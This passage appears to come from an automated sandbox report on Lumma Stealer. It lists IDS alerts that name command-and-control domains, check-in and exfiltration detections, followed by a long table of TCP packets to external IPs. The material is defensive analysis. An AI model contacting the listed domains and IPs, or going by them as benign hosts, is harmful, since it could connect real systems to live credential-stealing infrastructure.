                                                                                                                                                                                                                                                                2024-12-20T07:04:09.249702+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.6613451.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:09.472443+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.6615301.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:09.691347+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.6556331.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:09.910772+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.6548621.1.1.153UDP
                                                                                                                                                                                                                                                                2024-12-20T07:04:11.747273+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64972123.55.153.106443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:12.667635+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.64972123.55.153.106443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:14.477255+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649730104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:15.538055+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649730104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:15.538055+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649730104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:16.977941+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649737104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:17.761204+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649737104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:17.761204+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649737104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:20.251562+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649748104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:22.408919+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649754104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:24.648073+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649760104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:27.199008+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649765104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:27.960398+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649765104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:29.656807+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649771104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:33.207297+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649781104.21.66.86443TCP
                                                                                                                                                                                                                                                                2024-12-20T07:04:33.968807+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649781104.21.66.86443TCP

                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.290503979 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.290558100 CET44349708178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.290656090 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.293529987 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.293553114 CET44349708178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:04.762475967 CET44349708178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:04.762696981 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:04.765115023 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:04.765167952 CET44349708178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:04.765552044 CET44349708178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:04.812093973 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:04.814099073 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:04.814121008 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:04.814196110 CET44349708178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:05.329894066 CET44349708178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:05.330112934 CET44349708178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:05.330234051 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:05.331279039 CET49708443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:05.331316948 CET44349708178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.609517097 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.609608889 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.609695911 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.610052109 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.610090017 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.073086977 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.073287010 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.074731112 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.074752092 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.075119019 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.076255083 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.076284885 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.076344967 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.644010067 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.644227028 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.644295931 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.654263020 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.654324055 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.654357910 CET49710443192.168.2.6178.62.201.34
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.654373884 CET44349710178.62.201.34192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.356334925 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.356393099 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.356465101 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.356794119 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.356806993 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:11.747200966 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:11.747272968 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:11.748981953 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:11.748991013 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:11.749238014 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:11.750597954 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:11.795335054 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.667782068 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.667844057 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.667857885 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.667942047 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.667968988 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.667987108 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.668036938 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.668045044 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.718352079 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.846880913 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.846900940 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.846966028 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.846996069 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.847038984 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.847069025 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885117054 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885179996 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885200977 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885210991 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885245085 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885315895 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885351896 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885370970 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885380983 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885385990 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885401964 CET49721443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.885406971 CET4434972123.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.123809099 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.123850107 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.123931885 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.124195099 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.124207973 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.477176905 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.477255106 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.483346939 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.483357906 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.483789921 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.486130953 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.486260891 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:14.486289978 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.538127899 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.538378000 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.538487911 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.730216980 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.730216980 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.730243921 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.730251074 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.757874966 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.757961988 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.758060932 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.758395910 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:15.758433104 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.977849960 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.977941036 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.979099035 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.979131937 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.979480028 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.980643988 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.980701923 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:16.980736017 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761269093 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761409998 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761467934 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761502028 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761601925 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761693001 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761739969 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761751890 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761926889 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.761934042 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.766901970 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.767033100 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.767056942 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.783596992 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.783649921 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.783678055 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.827771902 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.880825043 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.921495914 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.921525955 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.956643105 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.956753016 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.956809044 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.956871033 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.957003117 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.957019091 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.957094908 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.957210064 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.959775925 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.959810972 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.959858894 CET49737443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:17.959875107 CET44349737104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.035836935 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.035886049 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.035962105 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.036257982 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:19.036274910 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.251360893 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.251562119 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.252831936 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.252844095 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.253168106 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.261653900 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.261820078 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:20.261852980 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083671093 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083806992 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083857059 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083906889 CET49748443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.083928108 CET44349748104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.189266920 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.189316034 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.189393997 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.189681053 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:21.189698935 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.408716917 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.408919096 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.410001040 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.410022020 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.410559893 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.411756992 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.411894083 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.411941051 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.411997080 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:22.412004948 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.214493036 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.214720964 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.214926958 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.214970112 CET49754443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.214988947 CET44349754104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.386877060 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.386917114 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.386972904 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.387336969 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:23.387350082 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.647840977 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.648072958 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.683618069 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.683676004 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.684549093 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.685925007 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.686106920 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.686172962 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.686254025 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:24.686269999 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.615819931 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.616096973 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.616163969 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.616348982 CET49760443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.616389990 CET44349760104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.977165937 CET49765443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.977258921 CET44349765104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.977346897 CET49765443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.977658033 CET49765443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:25.977693081 CET44349765104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.198915958 CET44349765104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.199007988 CET49765443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.228327990 CET49765443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.228365898 CET44349765104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.229254961 CET44349765104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.232520103 CET49765443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.235841990 CET49765443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.235867977 CET44349765104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.960411072 CET44349765104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.960535049 CET44349765104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.960585117 CET49765443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.960705996 CET49765443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:27.960730076 CET44349765104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:28.441849947 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:28.441900969 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:28.442044020 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:28.442528009 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:28.442543030 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.656738997 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.656806946 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.658190966 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.658273935 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.658514977 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.659715891 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.660502911 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.660538912 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.660733938 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.660769939 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.660872936 CET49771443192.168.2.6104.21.66.86
